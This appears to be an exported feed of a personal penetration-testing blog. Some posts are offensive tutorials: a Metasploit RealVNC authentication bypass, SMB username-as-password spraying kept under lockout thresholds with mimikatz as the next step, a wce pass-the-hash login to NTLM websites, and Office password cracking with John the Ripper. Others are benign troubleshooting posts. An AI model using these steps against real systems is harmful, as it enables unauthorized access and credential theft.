tag:blogger.com,1999:blog-36274291618577955892024-03-29T03:16:45.168-06:00break stuff majorlyThese days I like to break stuff more than fix stuff.Unknownnoreply@blogger.comBlogger41125tag:blogger.com,1999:blog-3627429161857795589.post-46535223419568921422018-10-09T22:19:00.003-05:002018-10-09T22:20:06.068-05:00My New Blog!I've started a new blog, so head on over and check it out: <a href="https://jamesonhacking.blogspot.com/">https://jamesonhacking.blogspot.com/</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-71398819274347161092016-06-30T18:18:00.001-05:002016-06-30T18:29:44.384-05:00RealVNC Authentication Bypass<div dir="ltr">
Metasploit's RealVNC authentication bypass module for CVE-2006-2369 is pretty fun because it's one of those that is way too easy. If a victim has a RealVNC server which is earlier than 4.1.2, or a LibVNCServer VNC server earlier than 0.8.2, a customized VNC client can send 'Type 1 - None' as the authentication type and completely bypass authentication. Metasploit does this for you.</div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGaGQIkkVK1tEleQ0nSazoUybYeSa_TxmaRe2ht6uUrC7wWeSJpOH9-qsCOKtw27FEyjk9rynjvzJReq5SCjuXzev-E22ujnLYW7ux3aUnwo6ticQJPH9w7KcyyOoJVc1ZRBEVrk90ADo/s1600/vnc01CCCC.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGaGQIkkVK1tEleQ0nSazoUybYeSa_TxmaRe2ht6uUrC7wWeSJpOH9-qsCOKtw27FEyjk9rynjvzJReq5SCjuXzev-E22ujnLYW7ux3aUnwo6ticQJPH9w7KcyyOoJVc1ZRBEVrk90ADo/s640/vnc01CCCC.PNG" /></a></div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
This vulnerability was discovered by Steve Wiseman by accident while coding his own VNC software, so that's a fun fact. This is of course a very old vuln, but still exists out there, unfortunately. Here are the commands to exploit using msfconsole:</div>
<div dir="ltr">
<b><br /></b></div>
<div dir="ltr">
<b><i>use auxiliary/admin/vnc/realvnc_41_bypass</i></b><br />
<b><i>show options</i></b><br />
<b><i>set autovnc true</i></b><br />
<b><i>set rhost <target-victim></i></b><br />
<b><i>run</i></b></div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
At this point, Metasploit should automatically launch a VNC client and remote to the host while bypassing authentication. Fun stuff.</div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
Links:<br />
<a href="http://www.tenable.com/plugins/index.php?view=single&id=21564" target="_blank">http://www.tenable.com/plugins/index.php?view=single&id=21564</a><br />
<a href="https://vulners.com/metasploit/MSF:AUXILIARY/ADMIN/VNC/REALVNC_41_BYPASS" target="_blank">https://vulners.com/metasploit/MSF:AUXILIARY/ADMIN/VNC/REALVNC_41_BYPASS</a><br />
<a href="http://www.intelliadmin.com/index.php/2006/05/security-flaw-in-realvnc-411/" target="_blank">http://www.intelliadmin.com/index.php/2006/05/security-flaw-in-realvnc-411/</a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-54146862524022043662016-05-28T00:52:00.001-05:002016-06-03T05:16:31.572-05:00Metasploit: Find Usernames Used As Passwords<div dir="ltr">
In an internal pen test, there are cases where you have pulled a list of domain usernames but are still looking to get the password for one of these accounts. One possible technique for accomplishing this would be to use Metasploit to identify any passwords which are the same as the username. Below are steps to use the Metasploit console (msfconsole) to perform this particular type of password attack. And here's a pretty picture of a test box performing such an attack on itself, just as an example:<br>
<br></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin-left: 1em; margin-right: 1em;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiH_Rgd34VCJrTcijhZJbuofxnB0gwsYwuPEhmjXGBupERCShWJGJbHqtCONxvZ6uBp5lz74TeWmi25HOTRDsu45AOXaRtrxiJ2Q7r6EmtHSUXG6s083eMbuakytKxQOfo4jYNandb3_0/s400/image001.png" style="color: #0000ee; font-family: sans-serif; margin-left: auto; margin-right: auto; text-align: center;" width="400"></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example attack</td></tr>
</tbody></table>
</div>
<br>
<div dir="ltr">
</div>
<div dir="ltr">
Instructions:</div><div dir="ltr"><br></div>
<div dir="ltr">
1. Put your list of usernames into a text file with one username per line, and place the file in the Metasploit directory.</div><div dir="ltr"><br></div>
<div dir="ltr">
2. Open the Metasploit console and run: <i><b>use auxiliary/scanner/smb/smb_login</b></i></div><div dir="ltr"><i><b><br></b></i></div>
<div dir="ltr">
3. Pick one domain workstation to test against and set it in MSF (Metasploit): <i><b>set RHOSTS <ip-address></b></i></div><div dir="ltr"><i><b><br></b></i></div>
<div dir="ltr">
4. Tell MSF the domain name: <b><i>set SMBDomain <domain></i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
5. Tell MSF the name of the file containing the usernames: <b><i>set USER_FILE <filename></i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
6. Tell MSF to use the username as the password: <b><i>set USER_AS_PASS true</i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
7. For some reason MSF doesn't like to run USER_AS_PASS unless you explicitly specify another password or password list, as well. If you don't do this, it will run the exploit but not actually test the username as the password. Just pick a random weak password to also test for perhaps, like this: <i><b>set SMBPass password123</b></i></div><div dir="ltr"><i><b><br></b></i></div>
<div dir="ltr">
8. If you know the password policy will allow three login failures without causing a lockout, consider also testing for blank passwords: <b><i>set BLANK_PASSWORDS true</i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
9. Then run the exploit with: <b><i>run</i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
One of the things I like about this method, is that it's not as loud as a full brute force. As long as you keep below the lockout policy, you may be able to stay under the radar completely, while still testing every single domain user. When the test is complete, you can see what kind of creds you got with this command: <b><i>creds</i></b></div><div dir="ltr"><b><i><br></i></b></div>
<div dir="ltr">
To export the creds as a file, you can use: <i><b>creds -o <filename.txt></b></i></div><div dir="ltr"><i><b><br></b></i></div>
<div dir="ltr">
To get help with the creds command, use: <i><b>creds -<u>h</u></b></i></div><div dir="ltr"><i><b><u><br></u></b></i></div>
<div dir="ltr">To list all possible options for the attack, use: <i style="font-family: sans-serif;"><b>show options</b></i></div><div dir="ltr"><br></div><div dir="ltr">
After getting a domain user's creds, the next step will often be to authenticate with these creds to various computers and run mimikatz. If you run mimikatz on enough workstations, you're bound to eventually find one that will yield domain admin creds, resulting in red team happiness.</div><div dir="ltr"><br></div>
<div dir="ltr">
Ciao!</div><div dir="ltr"><br></div><div dir="ltr"><br></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-40286332148051110012016-04-04T17:18:00.002-05:002016-04-04T20:56:00.913-05:00P2V Windows 7: BSOD SolutionFor whatever reason, when performing a P2V on a Windows 7 machine, you are very likely to experience a BSOD, even if you use VMware Converter. There is a painless workaround, however, using a combination of Sysinternals Disk2vhd and Starwind V2V Converter. In my case, after using these tools, I also had to make some registry edits with an offline registry editor in order to resolve the BSOD. The steps are actually quite easy, though it took me a while to figure them out.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT8nNTSAXeufbFKsjr-962bPSiSvun4JumMLh3sFTFOhTlb68UdLE5db7Yv3DfEFZRoH04lXOwXXcyNKvzCkSydTTQ2cn5z1ud8a-MB29iKnooaJvOEImTiV5-SOq6vGd8YfLGGK3oudM/s1600/starwind1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT8nNTSAXeufbFKsjr-962bPSiSvun4JumMLh3sFTFOhTlb68UdLE5db7Yv3DfEFZRoH04lXOwXXcyNKvzCkSydTTQ2cn5z1ud8a-MB29iKnooaJvOEImTiV5-SOq6vGd8YfLGGK3oudM/s400/starwind1.png" width="400" /></a></div>
<br />
<br />
Before I give you the how-to, I want to say I'm very thankful to <a href="http://itknowledgeexchange.techtarget.com/information-technology/windows-7-p2v-for-esxvmware-workstation/" target="_blank">these</a> <a href="http://www.bauer-power.net/2010/12/how-to-p2v-windows-7-for-use-in-vmware.html" target="_blank">two</a> bloggers for the information on the aforementioned tools, and also thankful to various forum posters from whom I got the needed registry settings. Today's post is meant to gather the various information I used into one resource and relate my experience. Also, the offline registry edit I did from a live (virtual) CD may be useful information to some. Here are the steps I used to P2V my Windows 7 Pro 64-bit machine so that it could be used in VMware Workstation Player:<br />
<br />
1. Download and run <a href="http://technet.microsoft.com/en-ca/sysinternals/ee656415.aspx" target="_blank">Disk2vhd</a> on the Windows 7 physical machine you want to convert.<br />
<br />
<div>
2. The Disk2vhd interface is very simple. Just be sure to set it to be vhd (not vhdx which would be for Windows 8) and let it do it's thang.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUJKLVx-f5zxiZ_frYm8tiOERiJLFOTuPO5GUupw1MNRM3HedJovP6B4Z1AZREogKnGQMjbe7R69_ErJMzBuXpyaK-a5w2vr8Z9-xK41PJXEkW4r1UkQkIwAQLOctZFbyXU4ijMWI0KAo/s1600/disk2vhd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUJKLVx-f5zxiZ_frYm8tiOERiJLFOTuPO5GUupw1MNRM3HedJovP6B4Z1AZREogKnGQMjbe7R69_ErJMzBuXpyaK-a5w2vr8Z9-xK41PJXEkW4r1UkQkIwAQLOctZFbyXU4ijMWI0KAo/s400/disk2vhd.png" width="400" /></a></div>
<br />
<br /></div>
<div>
3. Download, install and run <a href="https://www.starwindsoftware.com/converter" target="_blank">StarWind V2V Converter</a>. (They make you fill out a contact form and then they send you a download link. Or, you may be able to get <a href="https://www.starwindsoftware.com/tmplink/StarWindConverter.exe" target="_blank">this</a> link to work, so you don't have to. :) )</div>
<div>
</div>
<div>
</div>
<div>
4. Use StarWind V2V Converter to convert your vhd to a vmdk and copy the resulting vmdk to your host machine. It has very simple interface.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH3qWlz8Ixmtw69ExGsacK9f-D1wolwNx8k8k66gYZITOLBuii5hyphenhypheneU7r8m6d7hkFChHnJWN3SOJ4Ix3VphX2uRQpX4WWstwu958YIOTce5LoQrz8LunAGq1KBjV0-I10Jkegi26Gc34Y/s1600/starwind2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="335" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH3qWlz8Ixmtw69ExGsacK9f-D1wolwNx8k8k66gYZITOLBuii5hyphenhypheneU7r8m6d7hkFChHnJWN3SOJ4Ix3VphX2uRQpX4WWstwu958YIOTce5LoQrz8LunAGq1KBjV0-I10Jkegi26Gc34Y/s400/starwind2.png" width="400" /></a></div>
<br /></div>
<div>
5. Open VMware Workstation Player and create a new Windows 7 virtual machine. Before powering it on, however, remove the hard drive and replace it with the vmdk created above.</div>
<div>
<br /></div>
<div>
6. Power on the VM. In my case, at this point I still got a BSOD and was considering giving up. If this is you, read on...</div>
<div>
<br /></div>
<div>
7. You're going to have to make some offline registry edits on your unbootable system. You could do this by connecting your virtual hard drive of your VM to another Windows VM (google it), but my preference was to boot the VM to AVG Rescue CD. Just download <a href="http://www.avg.com/us-en/download.prd-arl">AVG Rescue CD</a> and boot your VM to the ISO.<br />
<br />
8. Choose the registry editor in the AVG Rescue CD menu under Utilities.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQrNcRv2EbsCD0pLA5k6ZFBw0pjYG-0VKLk43UyCxGiL90ncHz_tmg2j1VJtcKRbXsPYn-_bEsyvwfs0nRHVMRXX6BHJhdRRSzFkHoX8skIjkaEKl6zq-NUCWZbGoRQ1J_pA_AxW3rgjQ/s1600/avgrescue.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQrNcRv2EbsCD0pLA5k6ZFBw0pjYG-0VKLk43UyCxGiL90ncHz_tmg2j1VJtcKRbXsPYn-_bEsyvwfs0nRHVMRXX6BHJhdRRSzFkHoX8skIjkaEKl6zq-NUCWZbGoRQ1J_pA_AxW3rgjQ/s400/avgrescue.PNG" width="400" /></a></div>
<br />
<br />
9. Navigate to HKLM\SYSTEM\ControlSet[001]\services\<br />
<br />
10. For me, I was able to fix the problem by editing each of the following to be a value of 0:<br />
<br />
HKLM\SYSTEM\ControlSet[001]\services\LSI_SAS\Start<br />
HKLM\SYSTEM\ControlSet[001]\services\LSI_SAS2\Start<br />
<br />
However, reading online, it appears that some users with different drivers had to make other registry changes under HKLM\SYSTEM\ControlSet[001]\services\. Here are some of the other edits I saw on various forums:<br />
<br />
Aliide\Start = 3<br />
Amdide\Start =3<br />
Atapi\Start = 0<br />
Cmdide\Start = 3<br />
iaStorV\Start = 3<br />
intelide\Start = 0<br />
msahci\Start = 3<br />
pciide\Start = 3<br />
viaide\Start = 3<br />
<br />
Do not make these updates unless you know what you are doing. Consider writing down the current settings before making any changes so you can revert if needed.<br />
<br />
11. As soon as I made the LSI_SAS\Start and LSI_SAS2\Start registry edits and booted back into the native/guest OS, it started working!<br />
<br /></div>
<div>
<br /></div>
<div>
Specs:</div>
<div>
Host OS = lubuntu 14.04.4 64-bit</div>
<div>
Guest OS: Windows 7 Pro 64-bit<br />
Live CD: AVG Rescue CD ( <a href="http://www.avg.com/us-en/download.prd-arl">avg_arl_cdi_all_120_150814a10442.iso</a> )<br />
vmware Workstation 12 Player</div>
<br />
<div>
<br /></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-79289780168418975912015-09-16T00:53:00.001-05:002015-09-20T20:46:23.203-05:00Passing an NTLM Hash to the Browser<div dir="ltr">
In some scenarios, an attacker may have been able to extract Active Directory password hashes but has not been able to successfully crack some or all of them. In this case, it may be possible to perform authentication by merely passing the hash itself, instead of the password. The specific focus of this post, is a pass-the-hash attack on a website which uses NTLM authentication.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1SSmB31zONMTi2-x38DJUKzey8TPRvjxRxrpoMpylUZvN-VmdOkDumbtOtaEOna-_dIFZ44-8A5AJ-ln0CYHxbNbz09VsMg5aPjlSktCDZuZqTMZKny4ksno8KbydWlItedeUjh6QLZc/s1600/wce2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1SSmB31zONMTi2-x38DJUKzey8TPRvjxRxrpoMpylUZvN-VmdOkDumbtOtaEOna-_dIFZ44-8A5AJ-ln0CYHxbNbz09VsMg5aPjlSktCDZuZqTMZKny4ksno8KbydWlItedeUjh6QLZc/s400/wce2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">(click to zoom)</td></tr>
</tbody></table>
<br />
<br /></div>
<div dir="ltr">
Under normal circumstances, a user might pull up Internet Explorer and browse to the website which uses NTLM authentication. At that point, if this user is not a domain user, they would typically get a prompt for a username and password. If the user who is logged into the computer is a domain user, they would potentially be automatically logged in using the Windows credentials of the current login session. In the attack, our scenario involves an attacker who has already extracted the victim user's password hash (but not the actual password) and will use it for login. The attacker is logged into Windows with credentials which do not allow them access to the website in question. However, the attacker passes the hash to the current Windows session in order to impersonate the victim user. The attacker then browses to the website using Internet Explorer and is able to automatically authenticate without ever needing the password itself - only the hash. This attack can take place from any computer which is able to access the website. If the website is only accessible internally, as many such NTLM pages are, then the attacker would need to have access to a computer located on the LAN. However, if the website is accessible from the Internet, the attacker could perform the pass-the-hash attack from a remote location outside the network, depending on the individual circumstances. Below are the details on the attack.<br />
<br /></div>
<div dir="ltr">
<br /></div>
<div dir="ltr">
<b>TL;DR:</b><br />
Use <a href="https://dl.packetstormsecurity.net/Win/wce_v1_4beta_universal.zip">wce</a></div>
<div dir="ltr">
<b><br /></b></div>
<div dir="ltr">
<b>Prerequisites:</b><br />
Extracted hash (extraction process not covered in this post)<br />
Windows computer to perform the attack from<br />
Target website which uses NTLM authentication<br />
Connectivity to the website<br />
wce (Windows Credentials Editor)</div>
<div dir="ltr">
<b><br /></b></div>
<div dir="ltr">
<b>wce download link:</b><br />
<a href="https://dl.packetstormsecurity.net/Win/wce_v1_4beta_universal.zip">https://dl.packetstormsecurity.net/Win/wce_v1_4beta_universal.zip</a> (expect browser/AV blocking)</div>
<div dir="ltr">
<b><br /></b></div>
<div dir="ltr">
<b>Tested on:</b><br />
Windows 7, 64 bit<br />
Internet Explorer 11, 64 bit<br />
wce v1.4beta x64 (Windows Credentials Editor)</div>
<div dir="ltr">
<b><br /></b>
<b><br />Steps:</b><br />
1. Log onto the Windows computer which will be used for the attack<br />
2. Configure Internet Options:<br />
a. Security>Custom level for the zone>Automatic logon only in intranet zone<br />
b. Add website to Local Intranet sites<br />
3. Run wce, give it the hash and tell it to call IE: <b>wce -s <UserName>:<DomainName>:<LMHash>:<NTHash> -c "C:\Program Files\Internet Explorer\iexplore.exe"</b><br />
4. Browse to the website for the automatic login</div>
<div dir="ltr">
<br />
As you can see, the attack is very simple. Here are the wce command line switches in use:</div>
<div dir="ltr">
<br />
-s Changes NTLM credentials of current logon session. Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.<br />
-c Run <cmd> in a new session with the specified NTLM credentials.<br />
<br />
<br /></div>
<div dir="ltr">
Hmm...Maybe it's time to re-think that Sharepoint NTLM authentication.<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-78129136581161677112015-09-09T23:51:00.001-05:002022-02-06T21:40:50.392-06:00Cracking Microsoft Office File PasswordsThe best way to crack the password on a Microsoft Office file is by first extracting the hash of the actual password itself. But how to do that? The script office2john.py is really useful for this. It extracts the password hash and converts it to a format that John the Ripper can handle. This is not a tutorial on John, so you'll have to hit up google for that. But I'll give you the basic commands to get the job done. This should work on files from pretty much any version of Office, including xls and xlsx, etc. (Office 2003-2013).<br />
<br />
First, you'll need to download office2john.py. You can get it from github <a href="https://github.com/kholia/RC4-40-brute-office " target="_blank">here</a>. Or, you can download a copy I put <a href="https://drive.google.com/file/d/0B2G7-0pXZll4a0lyM0xlbHoxVVU/view?usp=sharing&resourcekey=0-5J9kQX1jSUMPEPzY1Jw55g" target="_blank">here</a>.<br />
<br />
Depending on your cracking strategy, you will likely also need a dictionary file for the attack. I will be using a dummy dictionary file as PoC, but there are lots out there and I won't go into that as a part of this post.<br />
<br />
You'll of course also need John installed (google it) and will need a target Office file. I'm doing this from Kali 2.0 on an Excel 2013 test file which I encrypted with a password from Excel. Here are the files/names I used:<br />
<br />
dictionary.lst (dictionary file)<br />
office2john.py (extracts hash)<br />
test-crack.xlsx (target)<br />
<br />
Okay, here we go. First, we extract the hash:<br />
<br />
<b>./office2john.py test-crack.xlsx > test-crack-hash.txt</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr5Ntlp6raEZ0V9EQKoCa3chODMRhCOYhGbPS9gcTJDY2PiTN6GBc27zkq4LEqxGRmU-edsHem_XfIi_2dFVASh1962NYMub0fkDalGNnjAu7n2spDDbP9KjpKCT17c3yeMxDFOtEcNCg/s1600/xlsx-crack-B3.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr5Ntlp6raEZ0V9EQKoCa3chODMRhCOYhGbPS9gcTJDY2PiTN6GBc27zkq4LEqxGRmU-edsHem_XfIi_2dFVASh1962NYMub0fkDalGNnjAu7n2spDDbP9KjpKCT17c3yeMxDFOtEcNCg/s400/xlsx-crack-B3.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">(click to zoom)</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
The hash has now been outputted to test-crack-hash.txt and we can begin cracking. The method I used was a dictionary attack:<br />
<br />
<b>john --session=xlsx --rules --wordlist=dictionary.lst test-crack-hash.txt</b><br />
<br />
Here is an explanation of the command line options used:<br />
<br />
<i>--session=</i><br />
<i>An optional identifier for you to manage the John session, in case you have multiple sessions. You can make the string after the equals sign be whatever you want.</i><br />
<i><br /></i>
<i>--rules</i><br />
<i>Enables wordlist rules</i><br />
<i><br /></i>
<i>--wordlist=</i><br />
<i>The dictionary file to use for the attack.</i><br />
<i><br /></i>
<i>[filename]</i><br />
<i>The last parameter is the text file containing the extracted hash.</i><br />
<br />
It should show the password when it completes, if your cracking was successful. You can also run the following to show the cracked password, after it completes: <b>john --show test-crack-hash.txt</b><br />
<br />
Now you should be able to open the Office file using the password you cracked. It goes without saying, that this should only be used for ethical purposes, so don't do evil stuff!<br />
<br />
Ciao!<br />
<br />
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-3627429161857795589.post-17555433787592762162015-08-30T23:44:00.000-05:002015-08-31T13:36:18.060-05:00Installing Kali via YUMII like to use <a href="http://www.pendrivelinux.com/yumi-multiboot-usb-creator/" target="_blank">YUMI</a> to maintain a USB thumb drive with various live operating systems and installers, including Kali. I generally prefer this over the <a href="http://docs.kali.org/downloading/kali-linux-live-usb-install" target="_blank">dd image method</a>. From time to time, I run into trouble with operating systems which aren't immediately compatible, but can often find a resolution. This was the case with Kali 2.0. I could boot into the installer, but the installer itself would fail to detect the installation media. This caused the installer to fail completely. Here are the screenshots - you can click to zoom.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZYIRyeR1tx_PnRqYgtYP4o68cIIwN3CKY1RcIO8m1EPV_v5ha5VRF2qKOiGKVSj_XLkiwTuHZGvtbRCsYsooR86q6YCH3wjpob3yAhDBaCcJX_LeMQKfKOh2eTLwUfTwRnu2huVd8Qqg/s1600/cdrom-detect_retry_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZYIRyeR1tx_PnRqYgtYP4o68cIIwN3CKY1RcIO8m1EPV_v5ha5VRF2qKOiGKVSj_XLkiwTuHZGvtbRCsYsooR86q6YCH3wjpob3yAhDBaCcJX_LeMQKfKOh2eTLwUfTwRnu2huVd8Qqg/s400/cdrom-detect_retry_0.png" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxlOI5fyO3syKNnRoFe24btK_ZK9-_igPU0gJJZfgx9XHCWBqSipRp2012mM3PK_z6O5uq8evl2CZdgcxr6mSy6w5w8iC_y_t6q6LjKYQCwKgHAzFCZLf88NfHKrj6oVg7iRKSgmeXeY/s1600/debian-installer_main-menu_item-failure_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxlOI5fyO3syKNnRoFe24btK_ZK9-_igPU0gJJZfgx9XHCWBqSipRp2012mM3PK_z6O5uq8evl2CZdgcxr6mSy6w5w8iC_y_t6q6LjKYQCwKgHAzFCZLf88NfHKrj6oVg7iRKSgmeXeY/s400/debian-installer_main-menu_item-failure_0.png" width="400" /></a></div>
<br />
<br />
Here's the fix I came up with. I went back to the menu and chose Execute a Shell. Using the shell, I deleted /cdrom and created a new symlink to /cdrom from the appropriate directory of the installation media. (Fyi, in this particular chassis, I don't have a CD-ROM drive at all.)<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibcHxvd6wcbNSeLqfSTfKYR0n2VtzGfYb50A7fsHNIsT4VIbkE0syRgOD9wy3HVJVr9EYbeyK_Tpxk-cPi0-D6bYgO_mVHeIvfBzOWtvPOXBUnvm3i1sD-IsoUDNf6d7pH7rHOFgSKYkA/s1600/debian-installer_main-menu_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibcHxvd6wcbNSeLqfSTfKYR0n2VtzGfYb50A7fsHNIsT4VIbkE0syRgOD9wy3HVJVr9EYbeyK_Tpxk-cPi0-D6bYgO_mVHeIvfBzOWtvPOXBUnvm3i1sD-IsoUDNf6d7pH7rHOFgSKYkA/s400/debian-installer_main-menu_0.png" width="400" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjak9FQugNCqzsk4jhxS0zULRzNrE0AeaesBHYcyNnzbg3pnGHhk2CWm_OjRo9R2Tmc5D3nEgJ3Auhyphenhyphenxhu_feNdLEirIM51CPQckilB9NQedGrUsNPHKTESa0EHlnWQO7yKb2neyDZOvPo/s1600/debian-installer_shell-plugin_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjak9FQugNCqzsk4jhxS0zULRzNrE0AeaesBHYcyNnzbg3pnGHhk2CWm_OjRo9R2Tmc5D3nEgJ3Auhyphenhyphenxhu_feNdLEirIM51CPQckilB9NQedGrUsNPHKTESa0EHlnWQO7yKb2neyDZOvPo/s400/debian-installer_shell-plugin_1.png" width="400" /></a></div>
<br />
<br />
This tricked the installer into thinking the files on the USB thumb drive were located on an installer CD. The issue was immediately resolved and the installer was able to proceed past the point it was stuck at.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcuQnMBUKZbNQCAqrijWSF4jBnctHulgVACppF947Gdmpapw288XM01cAiE5GnQQdg3KC4j_eKywiwUuZDc6E4YeRbfz9b5jowwyDqmQclK8U492wA162sIvwc4xL6BDwNeeSioI3sDfc/s1600/debian-installer_main-menu_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcuQnMBUKZbNQCAqrijWSF4jBnctHulgVACppF947Gdmpapw288XM01cAiE5GnQQdg3KC4j_eKywiwUuZDc6E4YeRbfz9b5jowwyDqmQclK8U492wA162sIvwc4xL6BDwNeeSioI3sDfc/s400/debian-installer_main-menu_1.png" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhddNvT0jznjwbI7jJq2sjygjCXbyy4pYPd7IjmRMQ182eY1qi9YVYa2sY1LuafOv0K50E8j4cPxjdXz_UsPfKaiW9cb4IjdCT0WoHCjMg34Dyj2WQTFMNLmHaRvvekXpqh199Btc6vpAA/s1600/anna_choose_modules_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhddNvT0jznjwbI7jJq2sjygjCXbyy4pYPd7IjmRMQ182eY1qi9YVYa2sY1LuafOv0K50E8j4cPxjdXz_UsPfKaiW9cb4IjdCT0WoHCjMg34Dyj2WQTFMNLmHaRvvekXpqh199Btc6vpAA/s400/anna_choose_modules_0.png" width="400" /></a></div>
<br />
<br />
Hope this little hack helps someone out!<br />
<br />
Ciao!<br />
<br />
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-3627429161857795589.post-3259255265936148242015-07-22T23:44:00.001-05:002015-07-23T03:11:59.710-05:00Kali Broken - "Cleaning up temporary files"I broke my Kali Linux. I was going wild with Burp Suite while forgetting I was low on disk space. Once I noticed the disk was full, it was too late. The system was too crashy to even use and I had to do a hard boot. Of course, once I did a hard boot it wouldn't come back up. The booting process would get stuck at "Cleaning up temporary files" and then eventually die at a blank screen. :(<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
